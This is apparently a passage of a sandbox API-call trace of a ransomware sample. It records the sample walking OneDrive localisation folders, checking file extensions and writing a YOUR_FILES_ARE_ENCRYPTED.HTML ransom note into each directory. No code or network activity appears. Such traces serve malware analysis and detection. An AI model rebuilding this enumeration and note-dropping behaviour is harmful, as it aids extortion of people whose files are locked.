[0112.645] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb049b8, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xdb049b8, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xdee5c50, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.645] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0112.645] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\or-in\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0112.645] GetProcessHeap () returned 0x600000 [0112.645] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.645] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\or-in\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\or-in\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0112.645] WriteFile (in: hFile=0x328, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.646] CloseHandle (hObject=0x328) returned 1 [0112.646] GetProcessHeap () returned 0x600000 [0112.647] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.647] GetProcessHeap () returned 0x600000 [0112.647] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.647] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdee5c50, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xdee5c50, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xdee5c50, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="pa", cAlternateFileName="")) returned 1 [0112.647] StrStrIW (lpFirst="pa", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.647] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa") returned 78 [0112.647] GetProcessHeap () returned 0x600000 [0112.647] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.648] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa" [0112.649] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa\\*" [0112.649] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdee5c50, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xdee5c50, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xe640666, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0112.649] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdee5c50, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xdee5c50, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xe640666, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="..", cAlternateFileName="")) returned 1 [0112.649] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe640666, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xe640666, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xe6d91fe, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.650] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.650] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.650] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.650] lstrlenW (lpString=".mui") returned 4 [0112.650] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.650] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe640666, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xe640666, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xe6d91fe, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.650] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0112.650] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.650] GetProcessHeap () returned 0x600000 [0112.650] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.650] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\pa\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0112.650] WriteFile (in: hFile=0x328, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.651] CloseHandle (hObject=0x328) returned 1 [0112.651] GetProcessHeap () returned 0x600000 [0112.652] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.652] GetProcessHeap () returned 0x600000 [0112.652] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.652] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6d91fe, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xe6d91fe, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xe6d91fe, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="pa-arab", cAlternateFileName="")) returned 1 [0112.652] StrStrIW (lpFirst="pa-arab", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.652] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa-arab") returned 83 [0112.652] GetProcessHeap () returned 0x600000 [0112.652] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.653] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa-arab" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa-arab") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa-arab" [0112.653] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa-arab", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa-arab\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa-arab\\*" [0112.654] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa-arab\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6d91fe, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xe6d91fe, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xedb3e67, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0112.654] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6d91fe, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xe6d91fe, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xedb3e67, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="..", cAlternateFileName="")) returned 1 [0112.654] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedb3e67, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xedb3e67, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xfb947ac, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.654] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.654] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa-arab\\FileSync.LocalizedResources.dll.mui") returned 119 [0112.654] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.654] lstrlenW (lpString=".mui") returned 4 [0112.654] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.654] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedb3e67, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xedb3e67, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xfb947ac, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.654] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0112.654] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0112.654] GetProcessHeap () returned 0x600000 [0112.654] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\pa-arab\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0112.655] WriteFile (in: hFile=0x328, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.656] CloseHandle (hObject=0x328) returned 1 [0112.656] GetProcessHeap () returned 0x600000 [0112.656] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.656] GetProcessHeap () returned 0x600000 [0112.656] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.656] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfcc5962, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xfcc5962, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xfcc5962, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="pa-arab-pk", cAlternateFileName="PA-ARA~1")) returned 1 [0112.656] StrStrIW (lpFirst="pa-arab-pk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.656] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa-arab-pk") returned 86 [0112.656] GetProcessHeap () returned 0x600000 [0112.656] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.656] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa-arab-pk" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa-arab-pk") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa-arab-pk" [0112.656] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa-arab-pk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa-arab-pk\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa-arab-pk\\*" [0112.656] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa-arab-pk\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfcc5962, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xfcc5962, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x103c6b62, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName=".", cAlternateFileName="")) returned 0x626978 [0112.657] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfcc5962, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xfcc5962, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x103c6b62, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="..", cAlternateFileName="")) returned 1 [0112.657] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c6b62, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x103c6b62, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1083ed90, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.657] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.657] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa-arab-pk\\FileSync.LocalizedResources.dll.mui") returned 122 [0112.657] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.657] lstrlenW (lpString=".mui") returned 4 [0112.657] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.657] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c6b62, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x103c6b62, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1083ed90, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.657] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0112.657] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa-arab-pk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0112.657] GetProcessHeap () returned 0x600000 [0112.657] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.657] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pa-arab-pk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\pa-arab-pk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0112.658] WriteFile (in: hFile=0x328, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.659] CloseHandle (hObject=0x328) returned 1 [0112.659] GetProcessHeap () returned 0x600000 [0112.659] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.659] GetProcessHeap () returned 0x600000 [0112.659] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.659] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10bd26fa, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x10bd26fa, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x10bd26fa, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="pl", cAlternateFileName="")) returned 1 [0112.659] StrStrIW (lpFirst="pl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.659] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pl") returned 78 [0112.659] GetProcessHeap () returned 0x600000 [0112.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.659] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pl" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pl") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pl" [0112.659] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pl", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pl\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pl\\*" [0112.659] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pl\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10bd26fa, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x10bd26fa, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1102b950, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName=".", cAlternateFileName="")) returned 0x626778 [0112.660] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10bd26fa, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x10bd26fa, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1102b950, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="..", cAlternateFileName="")) returned 1 [0112.660] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1102b950, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1102b950, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1149d5d9, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x16ec0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.660] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.660] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pl\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.660] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.660] lstrlenW (lpString=".mui") returned 4 [0112.660] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.660] 